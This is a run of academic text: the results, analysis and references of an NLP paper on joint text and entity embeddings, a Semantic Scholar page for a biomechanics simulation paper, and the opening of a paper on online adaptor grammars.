(Singh et al., 2012). 403 • Pershina (Pershina et al., 2015) improved EL by modeling coherence using the personalized page rank algorithm. • Globerson (Globerson et al., 2016) improved the coherence model for EL by introducing an attention mechanism in order to focus only on strong relations of entities. • Yamada (Yamada et al., 2016) proposed a model for learning the joint distributed repre- sentations of words and KB entities from KB, and addressed EL using context models based on the representations. 3.2.4 Results Table 4 compares the results of our method with those obtained with the state-of-the-art methods. Our method achieved strong results on both the CoNLL and the TAC 2010 datasets. In particular, the NTEE model clearly outperformed the other pro- posed models. We also tested the performance of the NTEE model without using the string similarity features (strsim) and found that these features also contributed to the performance. Furthermore, our method successfully outper- formed all the recent strong state-of-the-art methods on both datasets. This is remarkable because most state-of-the-art EL methods, including all baseline methods except that of He, adopt global approaches, where all entity mentions in a document are simul- taneously disambiguated based on coherence among disambiguation decisions. Our method depends only on the local (or textual) context available in the target document. Thus, the performance can likely be improved further by combining a global model with our local model as frequently observed in past work (Ratinov et al., 2011; Chisholm and Hachey, 2015; Yamada et al., 2016). We also conducted a brief error analysis using the NTEE model and the test set of the CoNLL dataset by randomly inspecting 200 errors. As a result, 22% of the errors were mentions of which the referent entities were not contained in our vocabulary. In this case, our method could not incorporate any con- textual information, thus likely resulting in disam- biguation errors. The other major types of errors were the mentions of location names. The dataset contains many location names (e.g., Japan) referring CoNLL (Micro) CoNLL (Macro) TAC10 (Micro) NTEE 94.7 94.3 87.7 NTEE (w/o strsim) 92.9 92.7 85.8 Fixed NTEE 92.6 93.1 85.9 SG-proj 87.8 89.5 82.5 SG-proj-dbp 86.5 89.5 83.0 Hoffart (2011) 82.5 81.7 - He (2013) 85.6 84.0 81.0 Chisholm (2015) 88.7 - 80.7 Pershina (2015) 91.8 89.9 - Globerson (2016) 92.7 - 87.2 Yamada (2016) 93.1 92.6 85.2 Table 4: Accuracies of the proposed method and the state-of-the-art methods. to sports team entities (e.g., Japan national football team). It appeared that our method neglected to dis- tinguish whether a location name refers to the loca- tion itself or a sports team. In particular, our method often wrongly resolved these mentions referring to sports team entities into the corresponding location entities and vice versa. They accounted for 20.5% and 14.5% out of the total number of errors, respec- tively. Moreover, we observed several difficult cases such as selecting Hindu instead of Hindu national- ism, Christian instead of Catholicism, New York City instead of New York, and so forth. 3.3 Factoid Question Answering Question Answering (QA) has been one of the cen- tral problems in NLP research for the last few decades. Factoid QA is one of the typical types of QA that aims to predict an entity (e.g., events, au- thors, and actors) that is discussed in a given ques- tion. Quiz bowl is a popular trivia quiz game in which players are asked questions consisting of 4– 6 sentence questions describing entities. The dataset of the quiz bowl has been frequently used for evalu- ating factoid QA methods in recent literature on QA (Iyyer et al., 2014; Iyyer et al., 2015; Xu and Li, 2016). In this section, we demonstrate that our proposed representations can be effectively used as back- ground knowledge for the QA task. 404 3.3.1 Setup We followed an existing method (Xu and Li, 2016) for our experimental setup. We used the public quiz bowl dataset proposed in Iyyer et al. (2014).13 Following past work (Iyyer et al., 2014; Iyyer et al., 2015; Xu and Li, 2016), we only used questions belonging to the history and literature cat- egories, and only used answers that appeared at least six times. For questions referring to the same an- swer, we sampled 20% of each for the development set and test sets, and the remaining 60% for the train- ing set. As a result, we obtained 1,535 training, 511 development, and 511 test questions for history, and 2,524 training, 840 development, and 840 test ques- tions for literature. The number of possible answers was 303 and 424 in the history and literature cate- gories, respectively. 3.3.2 Our Method Following past work (Iyyer et al., 2014; Iyyer et al., 2015; Xu and Li, 2016), we address this task as a classification problem that selects the most rele- vant answer from the possible answers observed in the dataset. We adopt the same neural network ar- chitecture described in Section 3.2.2 (see Figure 1). We use the following three features: the vector of the entity ve14, the vector of the question vt (com- puted using Eq. (2)), and the dot product of ve and vt. Note that we do not include other features in this task. The hyper-parameters used in our model (i.e., the number of units in the hidden layer and the dropout probability) are shown in Table 3. We tuned these parameters using the development set of each dataset. Unlike the EL task, we updated all parameters including representations of words and entities for training our QA method. We used stochastic gra- dient descent (SGD) to train the model. The mini- batch size was fixed at 100, and the learning rate was controlled by RMSprop. We used the accuracy 13The dataset was downloaded from https://cs.umd. edu/˜miyyer/qblearn/. Note that the public dataset is significantly smaller than the one used in past work (Iyyer et al., 2014; Iyyer et al., 2015) because they also used a proprietary dataset in addition to the public dataset. 14Similar to our EL method, we also normalize ve to unit length because of its overall higher accuracy. on the development set of each dataset to detect the best epoch. Similar to the EL task, we tested the four models to initialize the representations vt and ve, i.e., the NTEE, the fixed NTEE, the SG-proj, and the SG- proj-dbp models. Further, the representations of the NTEE model and the fixed NTEE model were those that were trained with the sentences because of their overall superior accuracy compared to those trained with paragraphs. 3.3.3 Baselines We use two types of baselines: two conventional bag-of-words (BOW) models and two state-of-the- art neural network models. The details of these mod- els are as follows: • BOW (Iyyer et al., 2014) is a conventional ap- proach using a logistic regression (LR) classi- fier trained with binary BOW features to pre- dict the correct answer. • BOW-DT (Iyyer et al., 2014) is based on the BOW baseline augmented with the feature set with dependency relation indicators. • QANTA (Iyyer et al., 2014) is an approach based on a recursive neural network to de- rive the distributed representations of ques- tions. The method also uses the LR classifier with the derived representations as features. • FTS-BRNN (Xu and Li, 2016) is based on the bidirectional recurrent neural network (RNN) with gated recurrent units (GRU). Similar to QANTA, the method adopts the LR classifier with the derived representations as features. 3.3.4 Results Table 5 shows the results of our methods com- pared with those of the baseline methods. The re- sults of BOW, BOW-DT, and QANTA were obtained from Xu and Li (2016). We also include the result reported in Iyyer et al. (2014) (denoted by QANTA- full), which used a significantly larger dataset than ours for training and testing. The experimental results show that our NTEE model achieved the best performance compared to the other proposed models and all the baseline meth- ods on both the history and the literature datasets. 405 Name History Literature NTEE 94.7 95.1 Fixed NTEE 90.0 93.5 SG-proj 86.5 87.9 SG-proj-dbp 86.5 87.3 BOW 50.8 46.2 BOW-DT 60.9 57.4 QANTA 65.8 63.0 QANTA-full 73.7 69.1 FTS-BRNN 88.1 93.1 Table 5: Accuracies of the proposed method and the state-of-the-art methods for the factoid QA task. In particular, despite the simplicity of the neural network architecture of our method compared to the state-of-the-art methods (i.e., QANTA and FTS- BRNN), our method clearly outperformed these methods. This demonstrates the effectiveness of our proposed representations as background knowledge for the QA task. We also conducted a brief error analysis using the test set of the history dataset. Our observations in- dicated that our method mostly performed perfect in terms of predicting the types of target answers (e.g., locations, events, and people). However, our method erred in delicate cases such as predicting Henry II of England instead of Henry I of England, and Syra- cuse, Sicily instead of Sicily. 3.4 Qualitative Analysis In order to investigate what happens inside our model, we conducted a qualitative analysis using our proposed representations trained with sentences. We first inspected the word representations of our model and our pre-trained representations (i.e., the skip-gram model) by computing the top five similar words of five words (i.e., her, dry, spanish, tennis, moon) using cosine similarity. The results are pre- sented in Table 6. Interestingly, our model is some- what more specific than the skip-gram model. For example, there is only one word she whose cosine similarity to the word her is more than 0.5 in our model, whereas all the corresponding similar words in the skip-gram model (i.e., she, his, herself, him, and mother) satisfy that condition. We observe a similar trend for the similar words of dry. Further- more, all the words similar to tennis are strictly re- lated to the sport itself in our model, whereas the corresponding similar words of the skip-gram model contain broader words such as ball sports (e.g., bad- minton and volleyball). A similar trend can be ob- served for the similar words of spanish and moon. Similarly, we also compared our entity represen- tations with those of the pre-trained representations by computing the top five similar entities of six en- tities (i.e., Europe, Golf, Tea, Smartphone, Scarlett Johansson, and The Lord of the Rings) with respect to cosine similarity. Table 7 contains the results. For the entities Europe and Golf, we observe similar trends to our word representations. Particularly, in our model, the most similar entities of Europe and Golf are Eastern Europe and Golf course, respec- tively, whereas those of the skip-gram model are Asia and Tennis, respectively. However, the simi- lar entities of most entities (e.g., Tea, Smartphone, Scarlett Johansson and The Lord of the Rings) ap- pear to be similar between our model and the skip- gram model. 4 Related Work Various neural network models that learn distributed representations of arbitrary-length texts (e.g., para- graphs and sentences) have recently been proposed. These models aimed to produce general-purpose text representations that can be used with ease in vari- ous downstream NLP tasks. Although most of these models learn text representations from an unstruc- tured text corpus (Le and Mikolov, 2014; Kiros et al., 2015; Kenter et al., 2016), there have also been proposed models that learn text representations by leveraging structured linguistic resources. For in- stance, Wieting et al. (2016) trained their model us- ing a large number of noisy phrase pairs retrieved from the Paraphrase Database (PPDB) (Ganitkevitch et al., 2013). Hill et al. (2016b) use several public dictionaries to train the model by mapping defini- tion texts in a dictionary to representations of the words explained by these texts. To our knowledge, our work is the first work to learn generic text repre- sentations with the supervision of entity annotations. Several methods have also been proposed for ex- tending the word embedding methods. For example, Levy and Goldberg (2014) proposed a method to train word embedding with dependency-based con- 406 Word Our model Skip-gram her she (0.65) to (0.41) and (0.40) his (0.40) in (0.39) she (0.86) his (0.77) herself (0.71) him (0.66) mother (0.64) dry wet (0.48) arid (0.46) moisture (0.44) grows (0.44) dried (0.43) wet (0.81) moist (0.73) drier (0.72) drying (0.70) moister (0.69) tennis doubles (0.86) atp (0.79) wimbledon (0.78) wta (0.75) slam (0.74) badminton (0.75) hardcourt (0.73) volleyball (0.72) racquetball (0.71) squash (0.68) spanish spain (0.76) madrid (0.70) andalusia (0.64) valencia (0.61) seville (0.60) spain (0.68) portuguese (0.68) french (0.68) catalan (0.67) mexican (0.67) moon lunar (0.78) crater (0.66) rim (0.66) craters (0.65) midpoint (0.59) lunar (0.68) moons (0.68) sun (0.68) earth (0.67) sadasaa (0.67) Table 6: Examples of top five similar words with their co- sine similarities in our learned word representations com- pared with those of the skip-gram model. texts, and Luan et al. (2016) used semantic role la- beling for generating contexts to train word embed- ding. Moreover, a few recent studies on learning en- tity embedding based on word embedding methods have been reported (Hu et al., 2015; Li et al., 2016). These models are typically based on the skip-gram model and directly model the semantic relatedness between KB entities. Our work differs from these studies because we aim to learn representations of arbitrary-length texts in addition to entities. Another related approach is the relational em- bedding (or knowledge embedding) (Bordes et al., 2013; Wang et al., 2014; Lin et al., 2015), which en- codes entities as continuous vectors and relations as some operations on the vector space, such as vector addition. These models typically learn representa- tions from large KB graphs consisting of entities and relations. Similarly, the universal schema (Riedel et al., 2013; Toutanova et al., 2015; Verga et al., 2016) jointly learned continuous representations of KB re- lations, entities, and surface text patterns for the re- lation extraction task. Finally, Yamada et al. (2016) recently proposed a method to jointly learn the embeddings of words and entities from Wikipedia using the skip-gram model and applied it to EL. Our method differs from their method in that their method does not directly model arbitrary-length texts (i.e., paragraphs and sentences), which we proved to be highly effective for various tasks in this paper. Moreover, we also showed that the joint embedding of texts and enti- ties can be applied not only to EL but also for wider applications such as semantic textual similarity and factoid QA. 5 Conclusions In this paper, we presented a novel model capable of jointly learning distributed representations of texts and entities from a large number of entity annota- tions in Wikipedia. Our aim was to construct the proposed general-purpose model such that it enables practitioners to address various NLP tasks with ease. We achieved state-of-the-art results on three impor- tant NLP tasks (i.e., semantic textual similarity, en- tity linking, and factoid question answering), which clearly demonstrated the effectiveness of our model. Furthermore, the qualitative analysis showed that the characteristics of our learned representations appar- ently differ from those of the conventional word em- bedding model (i.e., the skip-gram model), which we plan to investigate in more detail in the future. Moreover, we make our code and trained models publicly available for future research. Future work includes analyzing our model more extensively and exploring the effectiveness of our model in terms of other NLP tasks. We also aim to test more expressive neural network models (e.g., LSTM) to derive our text representations. Further- more, we believe that one of the promising direc- tions would be to incorporate the rich structural data of the KB such as relationships between entities, links between entities, and the hierarchical category structure of entities. 407 Entity Our model Skip-gram Europe Eastern Europe (0.67) Western Europe (0.66) Central Europe (0.64) Asia (0.64) North America (0.64) Asia (0.85) Western Europe (0.78) North America (0.76) Central Europe (0.75) Americas (0.73) Golf Golf course (0.76) PGA Tour (0.74) LPGA (0.74) Professional golfer (0.73) U.S. Open (0.71) Tennis (0.74) LPGA (0.72) PGA Tour (0.69) Golf course (0.68) Nicklaus Design (0.66) Tea Coffee (0.82) Green tea (0.81) Black tea (0.80) Camellia sinensis (0.78) Spice (0.76) Coffee (0.78) Green tea (0.76) Black tea (0.75) Camellia sinensis (0.74) Spice (0.73) Smartphone Tablet computer (0.93) Mobile device (0.89) Personal digital assistant (0.88) Android (operating system) (0.86) iPhone (0.85) Tablet computer (0.91) Personal digital assistant (0.84) Mobile device (0.84) Android (operating system) (0.82) Feature phone (0.82) Scarlett Johansson Kirsten Dunst (0.85) Anne Hathaway (0.85) Cameron Diaz (0.85) Natalie Portman (0.85) Jessica Biel (0.84) Anne Hathaway (0.79) Natalie Portman (0.78) Kirsten Dunst (0.78) Cameron Diaz (0.78) Kate Beckinsale (0.77) The Lord of the Rings The Hobbit (0.85) J. R. R. Tolkien (0.84) The Silmarillion (0.81) The Fellowship of the Ring (0.80) The Lord of the Rings (film series) (0.78) The Hobbit (0.77) J. R. R. Tolkien (0.76) The Silmarillion (0.71) The Fellowship of the Ring (0.70) Elvish languages (0.69) Table 7: Examples of top five similar entities with their cosine similarities in our learned entity representations with those of the skip-gram model. Acknowledgements We would like to thank the TACL editor Kristina Toutanova and the anonymous reviewers for helpful comments on an earlier draft of this paper. References Eneko Agirre, Carmen Banea, Claire Cardie, Daniel Cer, Mona Diab, Aitor Gonzalez-Agirre, Weiwei Guo, Rada Mihalcea, German Rigau, and Janyce Wiebe. 2014. SemEval-2014 Task 10: Multilingual Seman- tic Textual Similarity. In Proceedings of the 8th In- ternational Workshop on Semantic Evaluation, pages 81–91. Antoine Bordes, Nicolas Usunier, Alberto Garcia-Duran, Jason Weston, and Oksana Yakhnenko. 2013. Translating Embeddings for Modeling Multi-relational Data. In Advances in Neural Information Processing Systems 26, pages 2787–2795. Martin Brümmer, Milan Dojchinovski, and Sebastian Hellmann. 2016. DBpedia Abstracts: A Large-Scale, Open, Multilingual NLP Training Corpus. In Proceed- ings of the Tenth International Conference on Lan- guage Resources and Evaluation. Andrew Chisholm and Ben Hachey. 2015. Entity Dis- ambiguation with Web Links. Transactions of the As- sociation for Computational Linguistics, 3:145–156. Silviu Cucerzan. 2007. Large-Scale Named Entity Dis- ambiguation Based on Wikipedia Data. In Proceed- ings of the 2007 Joint Conference on Empirical Meth- ods in Natural Language Processing and Computa- tional Natural Language Learning, pages 708–716. Wei Fang, Jianwen Zhang, Dilin Wang, Zheng Chen, and 408 Ming Li. 2016. Entity Disambiguation by Knowledge and Text Jointly Embedding. In Proceedings of The 20th SIGNLL Conference on Computational Natural Language Learning, pages 260–269. Evgeniy Gabrilovich and Shaul Markovitch. 2007. Com- puting Semantic Relatedness Using Wikipedia-Based Explicit Semantic Analysis. In International Joint Conference on Artificial Intelligence, pages 1606– 1611. Juri Ganitkevitch, Benjamin Van Durme, and Chris Callison-Burch. 2013. PPDB: The Paraphrase Database. In Proceedings of the 2013 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Tech- nologies, pages 758–764. Amir Globerson, Nevena Lazic, Soumen Chakrabarti, Amarnag Subramanya, Michael Ringaard, and Fer- nando Pereira. 2016. Collective Entity Resolution with Multi-Focal Attention. In Proceedings of the 54th Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers), pages 621–631. Hannaneh Hajishirzi, Leila Zilles, Daniel S Weld, and Luke Zettlemoyer. 2013. Joint Coreference Res- olution and Named-Entity Linking with Multi-Pass Sieves. In Proceedings of the 2013 Conference on Empirical Methods in Natural Language Processing, pages 289–299. Zhengyan He, Shujie Liu, Mu Li, Ming Zhou, Longkai Zhang, and Houfeng Wang. 2013. Learning Entity Representation for Entity Disambiguation. In Pro- ceedings of the 51st Annual Meeting of the Associa- tion for Computational Linguistics (Volume 2: Short Papers), pages 30–34. Felix Hill, Kyunghyun Cho, and Anna Korhonen. 2016a. Learning Distributed Representations of Sentences from Unlabelled Data. In Proceedings of the 2016 Conference of the North American Chapter of the As- sociation for Computational Linguistics: Human Lan- guage Technologies, pages 1367–1377. Felix Hill, Kyunghyun Cho, Anna Korhonen, and Yoshua Bengio. 2016b. Learning to Understand Phrases by Embedding the Dictionary. Transactions of the Asso- ciation for Computational Linguistics, 4:17–30. Johannes Hoffart, Mohamed Amir Yosef, Ilaria Bordino, Hagen Fürstenau, Manfred Pinkal, Marc Spaniol, Bilyana Taneva, Stefan Thater, and Gerhard Weikum. 2011. Robust Disambiguation of Named Entities in Text. In Proceedings of the 2011 Conference on Empirical Methods in Natural Language Processing, pages 782–792. Zhiting Hu, Poyao Huang, Yuntian Deng, Yingkai Gao, and Eric Xing. 2015. Entity Hierarchy Embedding. In Proceedings of the 53rd Annual Meeting of the Associ- ation for Computational Linguistics and the 7th Inter- national Joint Conference on Natural Language Pro- cessing (Volume 1: Long Papers), pages 1292–1300. Mohit Iyyer, Jordan Boyd-Graber, Leonardo Claudino, Richard Socher, and Hal Daumé III. 2014. A Neural Network for Factoid Question Answering over Para- graphs. In Proceedings of the 2014 Conference on Empirical Methods in Natural Language Processing, pages 633–644. Mohit Iyyer, Varun Manjunatha, Jordan Boyd-Graber, and Hal Daumé III. 2015. Deep Unordered Com- position Rivals Syntactic Methods for Text Classifica- tion. In Proceedings of the 53rd Annual Meeting of the Association for Computational Linguistics and the 7th International Joint Conference on Natural Language Processing (Volume 1: Long Papers), pages 1681– 1691. Heng Ji, Ralph Grishman, Hoa Trang Dang, Kira Grif- fitt, and Joe Ellis. 2010. Overview of the TAC 2010 Knowledge Base Population Track. In Proceeding of Text Analytics Conference. Tom Kenter, Alexey Borisov, and Maarten de Rijke. 2016. Siamese CBOW: Optimizing Word Embed- dings for Sentence Representations. In Proceedings of the 54th Annual Meeting of the Association for Com- putational Linguistics (Volume 1: Long Papers), pages 941–951. Ryan Kiros, Yukun Zhu, Ruslan R Salakhutdinov, Richard Zemel, Raquel Urtasun, Antonio Torralba, and Sanja Fidler. 2015. Skip-Thought Vectors. In Ad- vances in Neural Information Processing Systems 28, pages 3294–3302. Quoc V. Le and Tomas Mikolov. 2014. Distributed Rep- resentations of Sentences and Documents. In Proceed- ings of the 31st International Conference on Machine Learning (Volume 32), pages 1188–1196. Omer Levy and Yoav Goldberg. 2014. Dependency- Based Word Embeddings. In Proceedings of the 52nd Annual Meeting of the Association for Computational Linguistics (Volume 2: Short Papers), pages 302–308. Jiwei Li, Thang Luong, and Dan Jurafsky. 2015. A Hierarchical Neural Autoencoder for Paragraphs and Documents. In Proceedings of the 53rd Annual Meet- ing of the Association for Computational Linguistics and the 7th International Joint Conference on Natural Language Processing (Volume 1: Long Papers), pages 1106–1115. Yuezhang Li, Ronghuo Zheng, Tian Tian, Zhiting Hu, Rahul Iyer, and Katia Sycara. 2016. Joint Embed- ding of Hierarchical Categories and Entities for Con- cept Categorization and Dataless Classification. In Proceedings of the 26th International Conference on Computational Linguistics, pages 2678–2688. 409 Yankai Lin, Zhiyuan Liu, Maosong Sun, Yang Liu, and Xuan Zhu. 2015. Learning Entity and Relation Em- beddings for Knowledge Graph Completion. In Pro- ceedings of the 29th AAAI Conference on Artificial In- telligence, pages 2181–2187. Xiao Ling, Sameer Singh, and Daniel S. Weld. 2015. Design Challenges for Entity Linking. Transactions of the Association for Computational Linguistics, 3:315– 328. Yi Luan, Yangfeng Ji, Hannaneh Hajishirzi, and Boyang Li. 2016. Multiplicative Representations for Unsuper- vised Semantic Role Induction. In Proceedings of the 54th Annual Meeting of the Association for Compu- tational Linguistics (Volume 2: Short Papers), pages 118–123. Marco Marelli, Stefano Menini, Marco Baroni, Luisa Bentivogli, Raffaella Bernardi, and Roberto Zampar- elli. 2014. A SICK Cure for the Evaluation of Compo- sitional Distributional Semantic Models. In Proceed- ings of the Ninth International Conference on Lan- guage Resources and Evaluation, pages 216–223. Edgar Meij, Wouter Weerkamp, and Maarten de Rijke. 2012. Adding Semantics to Microblog Posts. In Pro- ceedings of the Fifth ACM International Conference on Web Search and Data Mining, pages 563–572. Rada Mihalcea and Andras Csomai. 2007. Wikify!: Linking Documents to Encyclopedic Knowledge. In Proceedings of the Sixteenth ACM Conference on In- formation and Knowledge Management, pages 233– 242. Tomas Mikolov, Greg Corrado, Kai Chen, and Jeffrey Dean. 2013a. Efficient Estimation of Word Repre- sentations in Vector Space. In Proceedings of the In- ternational Conference on Learning Representations, pages 1–12. Tomas Mikolov, Ilya Sutskever, Kai Chen, Greg S. Cor- rado, and Jeff Dean. 2013b. Distributed Represen- tations of Words and Phrases and their Composition- ality. In Advances in Neural Information Processing Systems 26, pages 3111–3119. David Milne and Ian H. Witten. 2008. Learning to Link with Wikipedia. In Proceeding of the 17th ACM Con- ference on Information and Knowledge Management, pages 509–518. Jeff Mitchell and Mirella Lapata. 2008. Vector-based Models of Semantic Composition. In Proceedings of ACL-08: HLT, pages 236–244. Jeffrey Pennington, Richard Socher, and Christopher D Manning. 2014. GloVe: Global Vectors for Word Representation. In Proceedings of the 2014 Confer- ence on Empirical Methods in Natural Language Pro- cessing, pages 1532–1543. Maria Pershina, Yifan He, and Ralph Grishman. 2015. Personalized Page Rank for Named Entity Disam- biguation. In Proceedings of the 2015 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Tech- nologies, pages 238–243. Lev Ratinov, Dan Roth, Doug Downey, and Mike An- derson. 2011. Local and Global Algorithms for Dis- ambiguation to Wikipedia. In Proceedings of the 49th Annual Meeting of the Association for Computational Linguistics: Human Language Technologies, pages 1375–1384. Sebastian Riedel, Limin Yao, Andrew McCallum, and Benjamin M Marlin. 2013. Relation Extraction with Matrix Factorization and Universal Schemas. In Pro- ceedings of the 2013 Conference of the North Ameri- can Chapter of the Association for Computational Lin- guistics: Human Language Technologies, pages 74– 84. Sameer Singh, Amarnag Subramanya, Fernando Pereira, and Andrew McCallum. 2012. Wikilinks: A Large- scale Cross-Document Coreference Corpus Labeled via Links to Wikipedia. Technical Report UM-CS- 2012-015. Theano Development Team. 2016. Theano: A Python Framework for Fast Computation of Mathematical Ex- pressions. arXiv preprint arXiv:1605.02688v1. Tijmen Tieleman and Geoffrey Hinton. 2012. Lecture 6.5 - RMSProp, COURSERA: Neural Networks for Machine Learning. Technical report. Kristina Toutanova, Danqi Chen, Patrick Pantel, Hoifung Poon, Pallavi Choudhury, and Michael Gamon. 2015. Representing Text for Joint Embedding of Text and Knowledge Bases. In Proceedings of the 2015 Con- ference on Empirical Methods in Natural Language Processing, pages 1499–1509. Patrick Verga, David Belanger, Emma Strubell, Ben- jamin Roth, and Andrew McCallum. 2016. Multi- lingual Relation Extraction using Compositional Uni- versal Schema. In Proceedings of the 2016 Confer- ence of the North American Chapter of the Associa- tion for Computational Linguistics: Human Language Technologies, pages 886–896. Zhen Wang, Jianwen Zhang, Jianlin Feng, and Zheng Chen. 2014. Knowledge Graph and Text Jointly Em- bedding. In Proceedings of the 2014 Conference on Empirical Methods in Natural Language Processing, pages 1591–1601. John Wieting, Mohit Bansal, Kevin Gimpel, and Karen Livescu. 2016. Towards Universal Paraphrastic Sen- tence Embeddings. In Proceedings of the 2016 Inter- national Conference on Learning Representations. 410 Dong Xu and Wu-Jun Li. 2016. Full-Time Supervi- sion based Bidirectional RNN for Factoid Question Answering. arXiv preprint arXiv:1606.05854v2. Ikuya Yamada, Hiroyuki Shindo, Hideaki Takeda, and Yoshiyasu Takefuji. 2016. Joint Learning of the Em- bedding of Words and Entities for Named Entity Dis- ambiguation. In Proceedings of the 20th SIGNLL Con- ference on Computational Natural Language Learn- ing, pages 250–259. 411 412 work_we274m2onzbppkq6clxq7hg2pi ---- [PDF] Probabilistic biomechanical finite element simulations: whole-model classical hypothesis testing based on upcrossing geometry | Semantic Scholar Skip to search formSkip to main content> Semantic Scholar's Logo Search Sign InCreate Free Account You are currently offline. Some features of the site may not work correctly. DOI:10.7717/peerj-cs.96 Corpus ID: 32214297Probabilistic biomechanical finite element simulations: whole-model classical hypothesis testing based on upcrossing geometry @article{Pataky2016ProbabilisticBF, title={Probabilistic biomechanical finite element simulations: whole-model classical hypothesis testing based on upcrossing geometry}, author={T. Pataky and M. Koseki and P. G. Cox}, journal={PeerJ Comput. Sci.}, year={2016}, volume={2}, pages={e96} } T. Pataky, M. Koseki, P. G. Cox Published 2016 Computer Science PeerJ Comput. Sci. Statistical analyses of biomechanical finite element (FE) simulations are frequently conducted on scalar metrics extracted from anatomically homologous regions, like maximum von Mises stresses from demarcated bone areas. The advantages of this approach are numerical tabulability and statistical simplicity, but disadvantages include region demarcation subjectivity, spatial resolution reduction, and results interpretation complexity when attempting to mentally map tabulated results to original… Expand View via Publisher peerj.com Save to Library Create Alert Cite Launch Research Feed Share This Paper 2 Citations View All Figures, Tables, and Topics from this paper figure 1 figure 2 table 2 figure 3 figure 4 figure 5 figure 6 figure 7 figure 8 figure 9 figure 10 figure 11 figure 12 figure 13 figure 14 View All 15 Figures & Tables Simulation Finite element method Experiment Homology (biology) Table (database) Quantum field theory Computation Demarcation point Numerical analysis Triune continuum paradigm Iterative method Request for tender Computational anatomy Stress ball 2 Citations Citation Type Citation Type All Types Cites Results Cites Methods Cites Background Has PDF Publication Type Author More Filters More Filters Filters Sort by Relevance Sort by Most Influenced Papers Sort by Citation Count Sort by Recency A novel soft tissue prediction methodology for orthognathic surgery based on probabilistic finite element modelling P. Knoops, A. Borghi, +8 authors S. Schievano Computer Science, Medicine PloS one 2018 9 PDF Save Alert Research Feed Physical and statistical shape modelling in craniomaxillofacial surgery : a personalised approach for outcome prediction P. Knoops Medicine 2019 PDF Save Alert Research Feed References SHOWING 1-10 OF 67 REFERENCES SORT BYRelevance Most Influenced Papers Recency Applying geometric morphometrics to compare changes in size and shape arising from finite elements analyses P. O'higgins, N. Milne Mathematics 2013 37 PDF View 1 excerpt, references methods Save Alert Research Feed Statistical methods in finite element analysis. F. H. Dar, J. Meakin, R. Aspden Engineering, Medicine Journal of biomechanics 2002 182 Highly Influential View 6 excerpts, references methods Save Alert Research Feed Validity and sensitivity of a human cranial finite element model: implications for comparative studies of biting performance Viviana Toro-Ibacache, L. Fitton, M. Fagan, P. O'Higgins Biology, Medicine Journal of anatomy 2016 27 Save Alert Research Feed Incorporating uncertainty in mechanical properties for finite element-based evaluation of bone mechanics. P. Laz, J. Q. Stowe, M. Baldwin, A. Petrella, P. Rullkoetter Mathematics, Medicine Journal of biomechanics 2007 60 PDF Save Alert Research Feed The Impact of Simplifications on the Performance of a Finite Element Model of a Macaca fascicularis Cranium L. Fitton, Miguel Prôa, Charlie Rowland, Viviana Toro-Ibacache, P. O'higgins Computer Science, Medicine Anatomical record 2015 36 Save Alert Research Feed Strain in the ostrich mandible during simulated pecking and validation of specimen‐specific finite element models E. Rayfield Geology, Medicine Journal of anatomy 2011 41 View 3 excerpts, references background and methods Save Alert Research Feed The Response of Cranial Biomechanical Finite Element Models to Variations in Mesh Density J. Bright, E. Rayfield Computer Science, Medicine Anatomical record 2011 53 Save Alert Research Feed Finite element-based probabilistic analysis tool for orthopaedic applications S. Easley, S. Pal, Paul R. Tomaszewski, A. Petrella, P. Rullkoetter, P. Laz Computer Science, Medicine Comput. Methods Programs Biomed. 2007 78 Save Alert Research Feed Finite element modelling of squirrel, guinea pig and rat skulls: using geometric morphometrics to assess sensitivity P. Cox, M. Fagan, E. Rayfield, N. Jeffery Mathematics, Medicine Journal of anatomy 2011 63 View 1 excerpt, references methods Save Alert Research Feed High‐Resolution Three‐Dimensional Computer Simulation of Hominid Cranial Mechanics S. Wroe, K. Moreno, P. Clausen, C. Mchenry, D. Curnoe Geology, Medicine Anatomical record 2007 79 Save Alert Research Feed ... 1 2 3 4 5 ... Related Papers Abstract Figures, Tables, and Topics 2 Citations 67 References Related Papers Stay Connected With Semantic Scholar Sign Up About Semantic Scholar Semantic Scholar is a free, AI-powered research tool for scientific literature, based at the Allen Institute for AI. Learn More → Resources DatasetsSupp.aiAPIOpen Corpus Organization About UsResearchPublishing PartnersData Partners FAQContact Proudly built by AI2 with the help of our Collaborators Terms of Service•Privacy Policy The Allen Institute for AI By clicking accept or continuing to use the site, you agree to the terms outlined in our Privacy Policy, Terms of Service, and Dataset License ACCEPT & CONTINUE work_weg2bzj74zc7ho3i3aprp32l5e ---- Online Adaptor Grammars with Hybrid Inference Ke Zhai Computer Science and UMIACS University of Maryland College Park, MD USA zhaike@cs.umd.edu Jordan Boyd-Graber Computer Science University of Colorado Boulder, CO USA jordan.boyd.graber@colorado.edu Shay B. Cohen School of Informatics University of Edinburgh Edinburgh, Scotland, UK scohen@inf.ed.ac.uk Abstract Adaptor grammars are a flexible, powerful formalism for defining nonparametric, un- supervised models of grammar productions. This flexibility comes at the cost of expensive inference. We address the difficulty of infer- ence through an online algorithm which uses a hybrid of Markov chain Monte Carlo and variational inference. We show that this in- ference strategy improves scalability without sacrificing performance on unsupervised word segmentation and topic modeling tasks. 1 Introduction Nonparametric Bayesian models are effective tools to discover latent structure in data (Müller and Quin- tana, 2004). These models have had great success in text analysis, especially syntax (Shindo et al., 2012). Nonparametric distributions provide support over a countably infinite long-tailed distributions common in natural language (Goldwater et al., 2011). We focus on adaptor grammars (Johnson et al., 2006), syntactic nonparametric models based on probabilistic context-free grammars. Adaptor gram- mars weaken the strong statistical independence as- sumptions PCFGs make (Section 2). The weaker statistical independence assumptions that adaptor grammars make come at the cost of ex- pensive inference. Adaptor grammars are not alone in this trade-off. For example, nonparametric exten- sions of topic models (Teh et al., 2006) have substan- tially more expensive inference than their parametric counterparts (Yao et al., 2009). A common approach to address this compu- tational bottleneck is through variational infer- ence (Wainwright and Jordan, 2008). One of the advantages of variational inference is that it can be easily parallelized (Nallapati et al., 2007) or trans- formed into an online algorithm (Hoffman et al., 2010), which often converges in fewer iterations than batch variational inference. Past variational inference techniques for adap- tor grammars assume a preprocessing step that looks at all available data to establish the support of these nonparametric distributions (Cohen et al., 2010). Thus, these past approaches are not directly amenable to online inference. Markov chain Monte Carlo (MCMC) inference, an alternative to variational inference, does not have this disadvantage. MCMC is easier to implement, and it discovers the support of nonparametric mod- els during inference rather than assuming it a priori. We apply stochastic hybrid inference (Mimno et al., 2012) to adaptor grammars to get the best of both worlds. We interleave MCMC inference inside vari- ational inference. This preserves the scalability of variational inference while adding the sparse statis- tics and improved exploration MCMC 